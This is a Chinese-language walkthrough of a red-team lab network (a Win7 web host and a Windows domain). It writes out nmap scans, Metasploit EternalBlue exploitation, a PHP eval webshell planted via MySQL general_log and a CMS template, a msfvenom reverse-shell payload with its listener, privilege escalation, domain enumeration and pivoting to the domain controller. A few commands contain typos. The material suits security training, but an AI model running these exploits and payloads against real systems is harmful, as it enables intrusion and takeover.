靶机环境设置

  1. 一共有三台机器,其中win7是外网web主机,winserver08是域控主机,Win2k3是域成员

     

  2. 为了能让攻击机器能够与win7靶机通信,需要让它们处于同一个网络环境中,设置win7虚拟机,添加一块网卡,根据自己的虚拟机网卡进行设置,我的虚拟机NAT网卡是VMnet8,这里就给win7靶机添加VMnet8的NAT网卡

     

  3. 打开win7虚拟机,开机密码是hongrisec@2019,根据自己的虚拟机网络情况设置网卡ip和网关,让win7靶机和攻击机器处于同一个网段下

     

     

     

  4. 设置win7靶机防火墙,只开启域防火墙

     

外网突破

信息收集

  1. 主机发现

    nmap -sn 192.168.2.0/24

      

     

  2. 192.168.2.128是我的虚拟机软路由ip,192.168.2.133是攻击机器ip,那么192.168.2.135就是win7靶机的ip了,扫一下端口

    nmap -Pn -sV -sC -p 1-65535 192.168.2.135

      

     

  3. 开放了80端口,发现有445端口和3306端口,疑似有ms17-010永恒之蓝漏洞,待会用fscan扫一下,先访问一下80端口,发现是一个php探针的页面

     

  4. 底部有一个mysql检测,试一下弱口令root/root,连接成功

     

     

  5. dirsearch扫一下目录,发现有phpmyadmin

    python3 dirsearch.py -u http://192.168.2.135 -e *

      

     

  6. 御剑扫一下,发现有一个beifen.rar文件

     

getshell

方法一:ms17-010直接拿system权限

  1. fscan扫一下主机漏洞

    fscan.exe -h 192.168.2.135

      

     

  2. 发现ms17-010,使用msf扫一下

    search ms17_010
use 3
set rhost 192.168.2.135
exploit

      

     

     

  3. 扫描确认漏洞存在,使用exp进行利用(记得先把攻击机器上的杀软关掉,否则攻击会被拦截)

    use windows/smb/ms17_010_eternalblue
set 192.168.2.135
expoit

      

     

  4. 利用成功,直接拿下system权限

  5. msf拿下shell后出现乱码,输入如下命令即可解决

    chcp 65001

      

方法二:利用phpmyadmin数据库弱口令getshell

  1. 通过弱口令root/root登录phpmyadmin,在左侧的数据库名中发现一个叫做newyxcms的数据库

     

  2. 访问一下发现是一个建站系统cms,后面再看cms有没有漏洞,这里先进行phpMyAdmin的getshell,查询secure_file_priv(secure-file-priv是全局变量,指定文件夹作为导出文件存放的地方,这个值是只读的)是否为null

    show variables like '%secure%'

      

     

  3. 查询日志保存状态(ON代表开启 OFF代表关闭)和日志的保存路径

    show variables like '%general%'

      

     

  4. 若general_log为OFF,则修改这个值,开启日志保存

    set global general_log='on';

      

  5. 修改日志保存的路径(general_log_file值)

    SET global general_log_file='C:/phpStudy/WWW/2.php'

      

  1. 查询是否成功更改

    show variables like '%general%'

      

     

  2. 执行SQL语句写入一句话木马

    SELECT '<?php @eval($_POST[1]);?>';

      

     

  3. 使用蚁剑连接webshell,拿下权限

     

方法三:yxcms建站系统getshell

  1. 先扫描一下yxcms的目录

     

     

  2. 访问/yxcms/public/,发现有目录遍历

     

  3. 发现一个csv表格文件,不知道有什么用

     

     

  4. 查看robots.txt文件,发现有一个/protected目录

     

  5. 查看/yxcms/protected目录,又是一个目录遍历

     

  6. 通过目录遍历找到cms配置文件cdb.sql

     

  7. 密文没解出来,在cms首页的公告信息里面发现了默认口令admin/123456,登录地址/index.php?r=admin

     

  8. 使用默认口令登入后台

     

  9. yxcms后台有几种getshell的方法,这里只演示通过模板管理写入webshell的方法,点击前台模板—>模板管理—>新增文件,然后写入webshell

     

  10. 经过一番查找,找到了webshell文件的地址

     

  11. 蚁剑连接shell.php,成功拿下web权限!

     

权限提升

  1. 使用msf生成后门程序并上传至目标主机

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=4444 -f exe > shell.exe

      

     

  1. msf开启监听,webshell中运行后门程序,成功获取反弹shell

    use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.2.133  #攻击机器的ip,要接受反弹shell的ip地址
set lport 4444
run

      

     

     

  1. 反弹shell成功后使用msf内置命令进行提权,直接获取system权限

    getsystem

      

     

内网渗透

内网打点

  1. 查看内网网络信息,发现存在两个不同ip段的网关,存在内网

    ipconfig/all

      

     

     

  2. 查看一下系统补丁信息

    systeminfo

      

     

  3. 查看当前登录的域和用户

    net config workstation

      

     

  4. 判断主域

    net time /domain

      

     

  5. 查看域内主机

    net view

      

     

  6. 查看当前域内所有用户

    net user /domain

      

     

  7. 查看域控

    net group "domain controllers" /domain

      

     

  8. 通过ping命令获取域控IP

    ping OWA.god.org

      

     

横向移动

  1. 由于域控主机在另一个网段,攻击机器无法直接与域网段通信,需要在msf中添加一条路由进行转发,执行以下命令

    run autoroute -s 192.168.52.0/24

      

     

  2. 利用添加的路由进行内网主机和端口扫描,扫描一下域控主机192.168.52.138的139、445、3389端口,发现开放了139、445端口

    background
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.52.138
set ports 139,445,3389
run

      

     

  3. 扫描一下ms17-010,存在ms17-010漏洞

    search ms17_010
use 3
set rhost 192.168.52.138
exploit

      

     

  4. 利用ms17-010进行攻击,域控主机的确存在ms17-010漏洞,但是利用后直接蓝屏了,很是尴尬

    use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.52.138
exploit